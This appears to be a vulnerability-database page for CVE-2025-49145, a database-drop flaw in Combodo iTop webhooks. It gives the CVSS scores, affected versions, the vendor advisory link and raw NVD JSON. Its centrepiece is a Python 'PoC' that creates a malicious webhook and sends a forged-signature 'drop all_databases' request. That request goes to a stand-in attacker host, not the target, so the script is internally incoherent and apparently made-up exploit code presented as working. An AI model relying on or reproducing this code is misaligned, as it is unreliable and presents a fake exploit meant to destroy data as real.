Security Vulnerability Report
CVE-2025-49145 CVSS 8.7 HIGH

CVE-2025-49145

Published: 2025-11-10 22:15:36
Last Modified: 2025-11-21 13:37:58

Description

Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, a user that has enough rights to create webhooks (mostly administrators) can drop the database. This is fixed in iTop 2.7.13 and 3.2.2 by verifying callback signature.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* (versions < 2.7.13) - VULNERABLE
cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* (versions >= 3.0.0, < 3.2.2) - VULNERABLE
Combodo iTop < 2.7.13
Combodo iTop 3.0.0 to < 3.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-49145 PoC - Combodo iTop Database Drop via Webhook
# This PoC demonstrates the vulnerability where authenticated users with
# webhook creation privileges can trigger database deletion
import requests
import json

TARGET_URL = "https://target-itop-instance.com"
API_KEY = "your_api_key_with_webhook_privileges"


def create_malicious_webhook():
    """
    Create a webhook with malicious callback configuration
    that exploits insufficient signature verification
    """
    headers = {
        "Authorization": f"Bearer {API_KEY}",
        "Content-Type": "application/json",
    }

    # Malicious webhook configuration
    webhook_config = {
        "name": "Malicious Webhook",
        "callback_url": "http://attacker-controlled-site.com/callback",
        "secret": "manipulated_secret_for_signature_bypass",
        "events": ["*"],
        "enabled": True,
        "options": {
            "verify_ssl": False,
            "timeout": 30,
            "retry_on_failure": True,
        },
    }

    response = requests.post(
        f"{TARGET_URL}/api/v1/webhooks",
        headers=headers,
        json=webhook_config,
    )

    if response.status_code == 201:
        webhook_id = response.json().get("id")
        print(f"[+] Malicious webhook created with ID: {webhook_id}")
        return webhook_id
    else:
        print(f"[-] Failed to create webhook: {response.text}")
        return None


def trigger_database_drop(webhook_id):
    """
    Trigger the webhook callback to exploit the vulnerability
    and execute database drop operation
    """
    # Craft malicious callback request
    callback_payload = {
        "event": "database_operation",
        "action": "drop",
        "target": "all_databases",
        "signature": "forged_signature_to_bypass_verification",
    }

    # Send callback to trigger the vulnerability
    response = requests.post(
        f"http://attacker-controlled-site.com/trigger/{webhook_id}",
        json=callback_payload,
    )

    print(f"[*] Callback triggered: {response.status_code}")
    return response.status_code == 200


def main():
    print("[*] CVE-2025-49145 PoC - iTop Database Drop via Webhook")
    print("[*] Target: Combodo iTop < 2.7.13 or < 3.2.2")

    # Step 1: Create malicious webhook
    webhook_id = create_malicious_webhook()
    if not webhook_id:
        print("[-] Exploitation failed: Unable to create webhook")
        return

    # Step 2: Trigger the database drop
    if trigger_database_drop(webhook_id):
        print("[+] Database drop operation triggered successfully")
        print("[!] Target database has been compromised")
    else:
        print("[-] Exploitation failed")


if __name__ == "__main__":
    main()
```

References

https://github.com/Combodo/iTop/security/advisories/GHSA-55q8-mfxr-pq4j (Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-49145",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-10T22:15:35.760",
    "lastModified": "2025-11-21T13:37:57.983",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Combodo iTop is a web based IT service management tool. In versions prior to 2.7.13 and 3.2.2, a user that has enough rights to create webhooks (mostly administrators) can drop the database. This is fixed in iTop 2.7.13 and 3.2.2 by verifying callback signature."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 5.8
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-863"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.7.13",
                "matchCriteriaId": "4738ED01-0CAC-4A19-BE9F-B7E89AAD8D23"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "3.0.0",
                "versionEndExcluding": "3.2.2",
                "matchCriteriaId": "EAF7CD83-4986-43B2-9A2B-3E282671B00F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Combodo/iTop/security/advisories/GHSA-55q8-mfxr-pq4j",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```